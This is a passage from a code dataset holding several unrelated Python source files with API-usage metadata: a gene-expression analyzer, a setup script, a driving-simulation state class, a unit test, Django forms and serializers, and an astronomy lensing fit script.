"sqlalchemy.orm.validates", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 55, "usage_type": "call"}, {"api_name": "database.Base", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 65, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 68, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 69, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 69, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 70, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 70, "usage_type": "argument"}]} {"seq_id": "442221471", "text": "from typing import List, Dict\n\nfrom Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Analyzers.GlobalDifferentialAnalyzerBase import \\\n GlobalDifferentialAnalyzerBase\nfrom Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Measurers.GlobalRsemNormalizedCountMeasurer import \\\n GlobalRsemNormalizedCountMeasurer\nfrom Src.BioAnalyzer.CrossCutting.DTOs.GenePrioritization.GlobalDifferentialSampleDto import GlobalDifferentialSampleDto\nfrom Src.BioAnalyzer.Managers.GenePrioritization.GlobalDifferentialMessengerRnaSampleManager import \\\n GlobalDifferentialMessengerRnaSampleManager\nfrom Src.BioDataManagement.CrossCutting.DTOs.GeneExpressionLevelDto import GeneExpressionLevelDto\nfrom Src.Core.Entity.ProcessInfo import ProcessInfo\nfrom Src.Core.Entity.Status import Status\n\n\nclass GlobalMessengerRnaDifferentialAnalyzer(GlobalDifferentialAnalyzerBase[int, GeneExpressionLevelDto]):\n \"\"\"description of class\"\"\"\n def __init__(self):\n \"\"\"\n \"\"\"\n self.__manager = GlobalDifferentialMessengerRnaSampleManager()\n self.__measurer = GlobalRsemNormalizedCountMeasurer()\n\n def execute(self, values: Dict[int, List[GeneExpressionLevelDto]]) -> ProcessInfo:\n \"\"\"\n \n :param values: \n :return: \n \"\"\"\n diff_analysis_info = None\n\n try:\n diff_sample = GlobalDifferentialSampleDto(\n values=[self.__measurer.calculate(id_entrez,\n [l.case_value for l in levels],\n [l.control_value for l in levels])\n for id_entrez, levels in values.items()])\n\n except:\n diff_analysis_info = ProcessInfo(status=Status.Fail,\n message='Global differential analysis for messenger RNA samples has failed. See details to more information.',\n details=['{0}. {1}'.format(Status.Fail.name,\n 'Error in calculating the global differential analysis in the messenger RNA samples.')])\n\n if diff_analysis_info:\n return diff_analysis_info\n\n try:\n self.__manager.add_one(diff_sample)\n diff_analysis_info = ProcessInfo(status=Status.OK,\n message='Global differential analysis for messenger RNA samples has been successful. See details to more information.',\n details=['{0}. {1}'.format(Status.OK.name,\n 'Global differential analysis for messenger RNA samples has executed and saved in the system.')])\n\n except:\n diff_analysis_info = ProcessInfo(status=Status.Fail,\n message='Global differential analysis for messenger RNA samples has failed. See details to more information.',\n details=['{0}. {1}'.format(Status.Fail.name,\n 'Error in saving the global differential analysis for messenger RNA samples in the system.')])\n\n return diff_analysis_info", "sub_path": "Src/BioAnalyzer/Analysis/GenePrioritization/Steps/DifferentialAnalysis/Analyzers/GlobalMessengerRnaDifferentialAnalyzer.py", "file_name": "GlobalMessengerRnaDifferentialAnalyzer.py", "file_ext": "py", "file_size_in_byte": 3407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Analyzers.GlobalDifferentialAnalyzerBase.GlobalDifferentialAnalyzerBase", "line_number": 15, "usage_type": "name"}, {"api_name": "Src.BioDataManagement.CrossCutting.DTOs.GeneExpressionLevelDto.GeneExpressionLevelDto", "line_number": 15, "usage_type": "name"}, {"api_name": "Src.BioAnalyzer.Managers.GenePrioritization.GlobalDifferentialMessengerRnaSampleManager.GlobalDifferentialMessengerRnaSampleManager", "line_number": 20, "usage_type": "call"}, {"api_name": "Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Measurers.GlobalRsemNormalizedCountMeasurer.GlobalRsemNormalizedCountMeasurer", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "Src.BioDataManagement.CrossCutting.DTOs.GeneExpressionLevelDto.GeneExpressionLevelDto", "line_number": 23, "usage_type": "name"}, {"api_name": "Src.BioAnalyzer.CrossCutting.DTOs.GenePrioritization.GlobalDifferentialSampleDto.GlobalDifferentialSampleDto", "line_number": 32, "usage_type": "call"}, {"api_name": "Src.Core.Entity.ProcessInfo.ProcessInfo", "line_number": 39, "usage_type": "call"}, {"api_name": "Src.Core.Entity.Status.Status.Fail", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 39, "usage_type": "name"}, {"api_name": "Src.Core.Entity.Status.Status.Fail", "line_number": 41, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 41, "usage_type": "name"}, {"api_name": "Src.Core.Entity.ProcessInfo.ProcessInfo", "line_number": 49, "usage_type": "call"}, {"api_name": "Src.Core.Entity.Status.Status.OK", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 49, "usage_type": "name"}, {"api_name": "Src.Core.Entity.Status.Status.OK", "line_number": 51, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 51, "usage_type": "name"}, {"api_name": "Src.Core.Entity.ProcessInfo.ProcessInfo", "line_number": 55, "usage_type": "call"}, {"api_name": "Src.Core.Entity.Status.Status.Fail", "line_number": 55, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 55, "usage_type": "name"}, {"api_name": "Src.Core.Entity.Status.Status.Fail", "line_number": 57, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 57, "usage_type": "name"}, {"api_name": "Src.Core.Entity.ProcessInfo.ProcessInfo", "line_number": 23, "usage_type": "name"}]} {"seq_id": "421680653", "text": "\r\nfrom setuptools import setup, find_packages\r\n\r\nprint(find_packages())\r\nsource_packages = [\t\"vtandem\", \\\r\n\t\t\t\t\t\"vtandem.dft\", \\\r\n\t\t\t\t\t\"vtandem.visualization\", \\\r\n\t\t\t\t\t\"vtandem.visualization.quaternary\", \\\r\n\t\t\t\t\t\"vtandem.visualization.quaternary.quaternary_scripts\", \\\r\n\t\t\t\t\t\"vtandem.visualization.ternary\", \\\r\n\t\t\t\t\t\"vtandem.visualization.ternary.ternary_scripts\"\r\n\t\t\t\t\t]\r\nsource_image_files = [ \t(\"logo\", (\"logo/LogoLong.png\", \"logo/LogoSmall.png\")),\r\n\t\t\t\t\t\t(\"icon\", (\"icon/FolderBrowserIcon.png\", \"icon/QuestionIcon.png\"))\r\n\t\t\t\t\t\t]\r\n\r\nsetup(\r\n\tname = \"vtandem\",\r\n\tversion = \"2019.07.24\",\r\n\tdescription = \"\",\r\n\tauthor = \"Michael Y. Toriyama, Jiaxing Qu, Lidia C. Gomes, Elif Ertekin\",\r\n\tauthor_email = \"mathtoriyama@gmail.com\",\r\n\turl = \"\",\r\n\tpackages = source_packages,\r\n\tdata_files = source_image_files,\r\n\tpy_modules = [\"vtandem\"],\r\n\tentry_points = {\r\n\t\t\"console_scripts\": [\r\n\t\t\t\"vtandem = vtandem.vtandem:vtandem\"\r\n\t\t]\r\n\t},\r\n)\r\n\r\n\r\n\r\n\r\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 939, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "setuptools.find_packages", "line_number": 4, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 17, "usage_type": "call"}]} {"seq_id": "120028377", "text": "import gym\nfrom copy import deepcopy\nimport numpy as np\nfrom gym_urbandriving.assets import TrafficLight, Terrain, Street, Lane, Sidewalk, Car, CrosswalkLight, Pedestrian\nfrom gym_urbandriving.agents import *\nimport json\nimport os\nimport random\nimport six\n\nclass PositionState:\n \"\"\"\n Abstract class representing the objects in a scene\n \"\"\"\n\n def __init__(self, data, car_model=\"kinematic\"):\n self.dimensions = (1000, 1000)\n self.dynamic_objects = {}\n self.time = 0\n self.static_objects = []\n self.start_lanes = []\n self.goal_states = []\n self.agent_config = data['agents']\n self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions = [], [], []\n self.last_coll = -1\n\n if 'state' in data['environment']:\n state_config = data['environment']['state']\n basedir = os.path.dirname(__file__)\n state_config = json.load(open(os.path.join(basedir, \"configs/\", state_config + \".json\")))\n else:\n state_config = data['environment']['state_config']\n\n for obj_info in state_config['static_objects']:\n typ = {\"Terrain\":Terrain, \"Lane\":Lane, \"Street\":Street, \"Sidewalk\":Sidewalk}[obj_info.pop('type')]\n obj = typ(**obj_info)\n self.static_objects.append(obj)\n for obj_info in state_config['car_start_lanes']:\n self.start_lanes.append(Lane(**obj_info))\n\n self.state_config = state_config\n self.goal_states = state_config['goal_states']\n\n\n\n assert (car_model in {\"kinematic\", \"point\", \"reeds_shepp\"})\n self.car_model = car_model\n self.randomize()\n return\n\n def randomize(self):\n \"\"\"\n Randomly generates car and pedestrian positions\n \"\"\"\n self.dynamic_objects = {}\n self.dynamic_objects['controlled_cars'] = {}\n self.dynamic_objects['background_cars'] = {}\n self.dynamic_objects['pedestrians'] = {}\n self.dynamic_objects['traffic_lights'] = {}\n\n for car_index in range(self.agent_config['controlled_cars']):\n while True:\n start = np.random.random_integers(0, 3)\n lane = self.start_lanes[start]\n car = lane.generate_car(self.car_model)\n if not self.is_in_collision(car):\n self.dynamic_objects['controlled_cars'][str(car_index)] = car\n self.dynamic_objects['controlled_cars'][str(car_index)].destination = self.assign_goal_states(start)\n break\n\n for car_index in range(self.agent_config['background_cars']):\n while True:\n start = np.random.random_integers(0, 3)\n lane = self.start_lanes[start]\n car = lane.generate_car(self.car_model)\n if not self.is_in_collision(car):\n self.dynamic_objects['background_cars'][str(car_index)] = car\n self.dynamic_objects['background_cars'][str(car_index)].destination = self.assign_goal_states(start)\n break\n\n self.dynamic_objects['traffic_lights'] = {}\n if self.agent_config['use_traffic_lights']:\n\n for i, traffic_light in enumerate(self.state_config['traffic_lights']):\n self.dynamic_objects['traffic_lights'][str(i)] = TrafficLight(**traffic_light)\n self.dynamic_objects['crosswalk_lights'] = {}\n self.dynamic_objects['pedestrians'] = {} \n if self.agent_config['number_of_pedestrians']:\n for i, crosswalk_light in enumerate(self.state_config['crosswalk_lights']):\n self.dynamic_objects['crosswalk_lights'][str(i)] = CrosswalkLight(**crosswalk_light)\n\n start_sidewalks = [s for s in self.static_objects if type(s) == Sidewalk]\n\n for ped_index in range(self.agent_config['number_of_pedestrians']):\n while True:\n start = np.random.random_integers(0, len(start_sidewalks) - 1)\n sidewalk = start_sidewalks[start]\n ped = sidewalk.generate_man()\n if not self.is_in_collision(ped):\n self.dynamic_objects['pedestrians'][str(ped_index)] = ped\n break\n #TODO Add pedestrians\n\n self.create_agents()\n\n def assign_goal_states(self, start_lane):\n \"\"\"\n Assigns a random goal state to a car\n \"\"\"\n goal_choices = deepcopy(self.goal_states)\n del goal_choices[start_lane]\n choice = random.choice(goal_choices)\n\n return [choice['x'], choice['y'], choice['vel'], np.deg2rad(choice['angle_deg'])]\n\n def create_agents(self):\n \"\"\"\n Creates agents for objects in the scene\n \"\"\"\n agent_mappings = {}\n for k, v in six.iteritems(self.agent_config['agent_mappings']):\n agent_mappings[{\"Car\":Car,\n \"TrafficLight\":TrafficLight,\n \"CrosswalkLight\":CrosswalkLight,\n \"Pedestrian\":Pedestrian}[k]] = {\"PlanningPursuitAgent\":PlanningPursuitAgent,\n \"TrafficLightAgent\":TrafficLightAgent,\n \"CrosswalkLightAgent\":CrosswalkLightAgent,\n \"Agent\": Agent,\n \"PedestrianAgent\":PedestrianAgent,\n \"NeuralPursuitAgent\":lambda i:NeuralPursuitAgent(i,\n noise=self.agent_config['bg_state_space_config']['noise'],\n omission_prob=self.agent_config['bg_state_space_config']['omission_prob'])}[v]\n\n self.bg_agents = {}\n for key in self.dynamic_objects.keys():\n if not key == 'controlled_cars':\n self.bg_agents[key] = []\n for i, index in enumerate(self.dynamic_objects[key]):\n obj = self.dynamic_objects[key][index]\n if type(obj) in agent_mappings:\n self.bg_agents[key].append(agent_mappings[type(obj)](i))\n self.bg_agents['controlled_cars'] = []\n for i in range(self.agent_config['controlled_cars']):\n action_space = self.agent_config['action_space']\n agent = {'steering':SteeringActionAgent,\n 'velocity':VelocityActionAgent,\n 'trajectory':TrajectoryActionAgent}[action_space](i)\n self.bg_agents['controlled_cars'].append(agent)\n\n def is_in_collision(self,car):\n\n for obj in self.static_objects:\n if car.collides(obj):\n return True\n for key in self.dynamic_objects.keys():\n for i,obj in six.iteritems(self.dynamic_objects[key]):\n if car.collides(obj):\n return True\n return False\n\n\n def get_collisions(self):\n \"\"\"\n Get list of all collisions in this state\n\n Returns\n -------\n list\n List of tuples, where each tuple contains a pair of coliding object indices. Dynamic_collisions contains collisions between cars and other cars.\n list\n The corresponding list for collisions between dynamic objects and static objects\n \"\"\"\n if self.last_coll == self.time:\n return self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions\n self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions = [], [], []\n self.last_coll = self.time\n\n #TODO Fix this. Controlled cars can't collide with background cars\n for key in self.dynamic_objects.keys():\n for i, dobj in self.dynamic_objects[key].items():\n i = int(i)\n\n for j, sobj in enumerate(self.static_objects):\n if dobj.collides(sobj):\n self.static_collisions.append([i, j, key, 'static'])\n\n for inner_key in self.dynamic_objects.keys():\n for j, dobj1 in self.dynamic_objects[inner_key].items():\n j = int(j)\n if (not (i == j and key == inner_key)) and dobj.collides(dobj1):\n self.dynamic_collisions.append([i, j,key, inner_key])\n if key == 'controlled_cars':\n self.controlled_car_collisions.append([i, j,key, inner_key])\n\n return self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions\n\n\n def collides_any(self, agentnum,type_of_agent = 'background_cars'):\n \"\"\"\n Returns if the agentnum object in the scene is colliding with any other object\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n bool\n True if this object is colliding\n \"\"\"\n\n dynamic_collisions, static_collisions, _ = self.get_collisions()\n for coll in dynamic_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) in [(id1, t1), (id2, t2)]:\n return True\n for coll in static_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) is (id1, t1):\n return True\n return False\n\n def collides_any_dynamic(self, agentnum,type_of_agent = 'background_cars'):\n dynamic_collisions, static_collisions, _ = self.get_collisions()\n\n for coll in dynamic_collisions:\n id1, id2, t1, t2 = coll\n if (agentnum, type_of_agent) in [(id1, t1), (id2, t2)]:\n return True\n\n return False\n\n def min_dist_to_coll(self, agentnum,type_of_agent = 'background_cars'):\n \"\"\"\n Returns the minimum distance between the object with id agentnum and a collideable object.\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n float\n Distance to nearest collideable object\n \"\"\"\n min_dist = np.finfo('f').max\n obj = self.dynamic_objects[type_of_agent][agentnum]\n for j, sobj in enumerate(self.static_objects):\n if obj.can_collide(sobj):\n min_dist = min(min_dist, obj.dist_to(sobj))\n\n for key in self.dynamic_objects.keys():\n for j, dobj in enumerate(self.dynamic_objects):\n if j != agentnum and obj.can_collide(dobj):\n min_dist = min(min_dist, obj.dist_to(dobj))\n return min_dist\n\n def get_observations(self, observation_type):\n \"\"\"\n Returns a set\n\n Parameters\n ----------\n agentnum : int\n The index of the object to query\n\n Returns\n -------\n float\n Distance to nearest collideable object\n \"\"\"\n", "sub_path": "gym_urbandriving/state/state.py", "file_name": "state.py", "file_ext": "py", "file_size_in_byte": 11222, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "gym_urbandriving.assets.Terrain", "line_number": 35, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Lane", "line_number": 35, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Street", "line_number": 35, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Sidewalk", "line_number": 35, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Lane", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.random_integers", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 73, "usage_type": "attribute"}, {"api_name": "gym_urbandriving.assets.TrafficLight", "line_number": 85, "usage_type": "call"}, {"api_name": "gym_urbandriving.assets.CrosswalkLight", "line_number": 90, "usage_type": "call"}, {"api_name": "gym_urbandriving.assets.Sidewalk", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.random.random_integers", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 96, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 110, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 114, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 121, "usage_type": "call"}, {"api_name": "gym_urbandriving.assets.Car", "line_number": 122, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.TrafficLight", "line_number": 123, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.CrosswalkLight", "line_number": 124, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Pedestrian", "line_number": 125, "usage_type": "name"}, {"api_name": "six.iteritems", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.finfo", "line_number": 248, "usage_type": "call"}]} {"seq_id": "551269621", "text": "#!/usr/bin/env python\n\"\"\" \"\"\"\n\n# Standard library modules.\nimport unittest\nimport logging\n\n# Third party modules.\n\n# Local modules.\nfrom pyhmsa_gui.util.human import camelcase_to_words\n\n# Globals and constants variables.\n\nclass TestModule(unittest.TestCase):\n\n def setUp(self):\n unittest.TestCase.setUp(self)\n\n def tearDown(self):\n unittest.TestCase.tearDown(self)\n\n def testcamelcase_to_words(self):\n text = 'JohnDoe'\n actual = camelcase_to_words(text)\n expected = ('John', 'Doe')\n self.assertEqual(expected, actual)\n\n text = 'JohnDoeAndJaneDoe'\n actual = camelcase_to_words(text)\n expected = ('John', 'Doe', 'And', 'Jane', 'Doe')\n self.assertEqual(expected, actual)\n\n text = 'John'\n actual = camelcase_to_words(text)\n expected = ('John',)\n self.assertEqual(expected, actual)\n\nif __name__ == '__main__': #pragma: no cover\n logging.getLogger().setLevel(logging.DEBUG)\n unittest.main()\n", "sub_path": "pyhmsa_gui/util/test_human.py", "file_name": "test_human.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "unittest.TestCase", "line_number": 15, "usage_type": "attribute"}, {"api_name": "unittest.TestCase.setUp", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 18, "usage_type": "attribute"}, {"api_name": "unittest.TestCase.tearDown", "line_number": 21, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pyhmsa_gui.util.human.camelcase_to_words", "line_number": 25, "usage_type": "call"}, {"api_name": "pyhmsa_gui.util.human.camelcase_to_words", "line_number": 30, "usage_type": "call"}, {"api_name": "pyhmsa_gui.util.human.camelcase_to_words", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 40, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 41, "usage_type": "call"}]} {"seq_id": "432266898", "text": "# coding=utf-8\nfrom django import forms\nfrom django_summernote.widgets import SummernoteWidget\nfrom .models import Article\n\n\nclass ArticleForm(forms.ModelForm):\n class Meta:\n model = Article\n fields = [\n \"title\",\n \"image\",\n \"content\",\n \"draft\",\n \"publish\",\n ]\n widgets = {\n \"content\": SummernoteWidget(),\n }\n\n\nclass SearchForm(forms.Form):\n q = forms.CharField(max_length=100, label='Búsqueda')\n", "sub_path": "articles/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 503, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Article", "line_number": 9, "usage_type": "name"}, {"api_name": "django_summernote.widgets.SummernoteWidget", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 23, "usage_type": "name"}]} {"seq_id": "449882717", "text": "#!/usr/bin/env python\n#######################\n# Run a ML pdz fit for an nfw model\n########################\n\nimport numpy as np\nimport sys, ldac, astropy, astropy.io.fits as pyfits, cPickle\nimport shearprofile as sp\nimport nfwmodel\n\n\n\n##########################\n\ninputCatFile = sys.argv[1]\ninputPDZ = sys.argv[2]\nshapedistro_module = sys.argv[3]\noutputFile = sys.argv[4]\n\n##########################\n\ninputcat = ldac.openObjectFile(inputCatFile)\n\nconcentration = inputcat.hdu.header['CONCEN']\nzcluster = inputcat.hdu.header['Z']\n\n\nD_lens = sp.angulardist(zcluster)\npixscale = 0.2\nminPix = 0.3 * 3600. * (180./np.pi) / ( pixscale * D_lens )\nmaxPix = 5. * 3600. * (180./np.pi) / ( pixscale * D_lens )\n\ngoodObjs = np.logical_and(np.logical_and(inputcat['r_pix'] > minPix, \n inputcat['r_pix'] < maxPix),\n np.logical_and(inputcat['z_b'] > 0,\n inputcat['z_b'] < 1.25))\n\n\nshapedistro = __import__(shapedistro_module)\n\nbin_selectors = [np.logical_and(goodObjs, selector) \\\n for selector in shapedistro.bin_selectors(inputcat)]\n\n\npdzfile = open(inputPDZ, 'rb')\npdzrange, pdz = cPickle.load(pdzfile)\npdzrange = pdzrange.astype(np.float64)\npdz = pdz.astype(np.float64)\n\n\nbetas = sp.beta_s(pdzrange, zcluster)\n\nrs = np.arange(0.01, 1.0, 0.0005)\n\nrs, scan = nfwmodel.scan_model(rs, \n [inputcat['r_mpc'][x].astype(np.float64) for x in bin_selectors],\n [inputcat['ghats'][x].astype(np.float64) for x in bin_selectors],\n betas,\n [pdz[x] for x in bin_selectors],\n concentration,\n zcluster,\n shapedistro.likelihood_func,\n shapedistro.samples)\n\n\n\n\ncols = [ pyfits.Column(name = 'Rs', format = 'E', array = rs),\n pyfits.Column(name = 'prob', format = 'E', array = scan)]\ncat = pyfits.BinTableHDU.from_columns(cols)\ncat.header['EXTNAME']= 'OBJECTS'\n\ncat.writeto(outputFile, overwrite=True)\n", "sub_path": "nfwmodel_binned_batchrunner.py", "file_name": "nfwmodel_binned_batchrunner.py", "file_ext": "py", "file_size_in_byte": 2140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ldac.openObjectFile", "line_number": 22, "usage_type": "call"}, {"api_name": "shearprofile.angulardist", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.logical_and", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 41, "usage_type": "call"}, {"api_name": "cPickle.load", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 48, "usage_type": "attribute"}, {"api_name": "shearprofile.beta_s", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 53, "usage_type": "call"}, {"api_name": "nfwmodel.scan_model", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 57, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.Column", "line_number": 68, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 68, "usage_type": "name"}, {"api_name": "astropy.io.fits.Column", "line_number": 69, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 69, "usage_type": "name"}, {"api_name": "astropy.io.fits.BinTableHDU.from_columns", "line_number": 70, "usage_type": "call"}, {"api_name": "astropy.io.fits.BinTableHDU", "line_number": 70, "usage_type": "attribute"}, {"api_name": "astropy.io.fits", "line_number": 70, "usage_type": "name"}]} {"seq_id": "330832152", "text": "from django.contrib.auth.models import User\nfrom friendship.models import Friend, FriendshipRequest\nfrom rest_framework import serializers\nfrom rest_framework.fields import CharField,IntegerField\n\n\nclass UserFriendsSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Friend\n fields = ('to_user_id',)\n\nclass FriendshipRequestsSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = FriendshipRequest\n fields = ('id', 'from_user_id')\n\nclass SendRequestSerializer(serializers.ModelSerializer):\n from_user_id=IntegerField()\n to_user_id=IntegerField()\n class Meta:\n model = Friend\n fields = ['from_user_id', 'to_user_id', ]\n\n def create(self, validated_data):\n from_user_id = validated_data['from_user_id']\n to_user_id = validated_data['to_user_id']\n from_user=User.objects.get(pk=from_user_id)\n to_user=User.objects.get(pk=to_user_id)\n Friend.objects.add_friend(\n from_user=from_user,\n to_user=to_user,\n )\n return validated_data\n\nclass DeleteFriendSerializer(serializers.ModelSerializer):\n from_user_id=IntegerField()\n to_user_id=IntegerField()\n class Meta:\n model = Friend\n fields = ['from_user_id', 'to_user_id', ]\n\n def destroy(self, request):\n from_user_id = request['from_user_id']\n to_user_id = request['to_user_id']\n from_user=User.objects.get(from_user_id)\n to_user=User.objects.get(to_user_id)\n Friend.objects.remove_friend(\n from_user=from_user,\n to_user=to_user,\n )\n return request\n\nclass AcceptFriendRequestSerializer(serializers.ModelSerializer):\n request_id = IntegerField()\n class Meta:\n model = FriendshipRequest\n fields = ['request_id', ]\n\n def create(self, validated_data):\n request_id = validated_data['request_id']\n friend_request = FriendshipRequest.objects.get(pk=request_id)\n friend_request.accept()\n return validated_data\n\nclass RejectFriendRequestSerializer(serializers.ModelSerializer):\n request_id = IntegerField()\n class Meta:\n model = FriendshipRequest\n fields = ['request_id', ]\n\n def destroy(self, validated_data):\n request_id = validated_data['request_id']\n friend_request = FriendshipRequest.objects.get(pk=request_id)\n friend_request.reject()\n return validated_data", "sub_path": "deploy/back-end/friendapi/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 2465, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "friendship.models.Friend", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 12, "usage_type": "name"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 17, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 17, "usage_type": "name"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "friendship.models.Friend", "line_number": 21, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 28, "usage_type": "name"}, {"api_name": 